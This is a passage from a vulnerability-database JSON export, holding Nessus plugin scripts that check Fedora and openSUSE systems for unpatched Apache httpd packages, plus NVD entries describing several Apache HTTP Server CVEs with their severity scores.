Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-d22f50d985.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96114);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"FEDORA\", value:\"2016-d22f50d985\");\n\n script_name(english:\"Fedora 24 : httpd (2016-d22f50d985)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-8743, CVE-2016-2161, CVE-2016-0736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-d22f50d985\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"httpd-2.4.25-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T12:32:28", "description": "This update for apache2 provides the following fixes :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add NotifyAccess=all to systemd service files to prevent\n warnings in the log when using mod_systemd (bsc#980663).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-04-03T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-2017-417)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo"], "id": "OPENSUSE-2017-417.NASL", "href": "https://www.tenable.com/plugins/nessus/99155", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-417.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99155);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-417)\");\n script_summary(english:\"Check for the openSUSE-2017-417 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 provides the following fixes :\n\nSecurity issues fixed :\n\n - CVE-2016-0736: Protect mod_session_crypto data with a\n MAC to prevent padding oracle attacks (bsc#1016712).\n\n - CVE-2016-2161: Malicious input to mod_auth_digest could\n have caused the server to crash, resulting in DoS\n (bsc#1016714).\n\n - CVE-2016-8743: Added new directive 'HttpProtocolOptions\n Strict' to avoid proxy chain misinterpretation\n (bsc#1016715).\n\nBugfixes :\n\n - Add NotifyAccess=all to systemd service files to prevent\n warnings in the log when using mod_systemd (bsc#980663).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016712\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980663\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-debugsource-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-devel-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-event-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-event-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-example-pages-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-prefork-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-prefork-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-utils-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-utils-debuginfo-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-worker-2.4.16-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-worker-debuginfo-2.4.16-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2020-10-03T12:10:51", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2016. Notes: none.", "edition": 2, "cvss3": {}, "published": "2017-05-11T14:30:00", "title": "CVE-2016-8073", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2016-8073"], "modified": "2017-05-11T14:30:00", "cpe": [], "id": "CVE-2016-8073", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8073", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-02T06:14:29", "description": "The handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers.", "edition": 6, "cvss3": {}, "published": "2014-12-15T18:59:00", "title": "CVE-2014-3583", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3583"], "modified": "2017-10-03T01:29:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/o:apple:mac_os_x:10.10.2", "cpe:/o:apple:mac_os_x:10.9.5", "cpe:/a:apache:http_server:2.4.10", "cpe:/o:apple:os_x_server:5.0.3", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:apple:mac_os_x:10.10.0", "cpe:/o:apple:mac_os_x:10.10.3", "cpe:/o:apple:mac_os_x:10.10.1", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2014-3583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3583", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:os_x_server:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:13", "description": "The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-05T19:59:00", "title": "CVE-2016-8740", "type": "cve", "cwe": ["CWE-399", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8740"], "modified": "2018-04-25T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.19", "cpe:/a:apache:http_server:2.4.21", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.18", "cpe:/a:apache:http_server:2.4.22", "cpe:/a:apache:http_server:2.4.23"], "id": "CVE-2016-8740", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8740", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.21:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "The Apache HTTP Server through 2.4.23 follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an \"httpoxy\" issue. NOTE: the vendor states \"This mitigation has been assigned the identifier CVE-2016-5387\"; in other words, this is not a CVE ID for a vulnerability.", "edition": 9, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-19T02:00:00", "title": "CVE-2016-5387", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5387"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/a:apache:http_server:2.4.23", "cpe:/o:fedoraproject:fedora:24", "cpe:/a:redhat:jboss_web_server:2.1.0", "cpe:/a:hp:system_management_homepage:7.5.5.0", "cpe:/o:oracle:linux:7", "cpe:/o:oracle:linux:5.0", "cpe:/o:fedoraproject:fedora:23", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2016-5387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5387", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:hp:system_management_homepage:7.5.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_web_server:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:13", "description": "Apache HTTP Server, in all releases prior to 2.2.32 and 2.4.25, was liberal in the whitespace accepted from requests and sent in response lines and headers. Accepting these different behaviors represented a security concern when httpd participates in any chain of proxies or interacts with back-end application servers, either through mod_proxy or using conventional CGI mechanisms, and may result in request smuggling, response splitting and cache pollution.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-27T21:29:00", "title": "CVE-2016-8743", "type": "cve", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8743"], "modified": "2018-04-25T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.18", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4"], "id": "CVE-2016-8743", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8743", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. This made it vulnerable to padding oracle attacks, particularly with CBC.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-27T21:29:00", "title": "CVE-2016-0736", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0736"], "modified": "2018-04-25T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.19", "cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.21", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.22", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.0", "cpe:/a:apache:http_server:2.4.14"], "id": "CVE-2016-0736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0736", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:04", "description": "In Apache HTTP Server versions 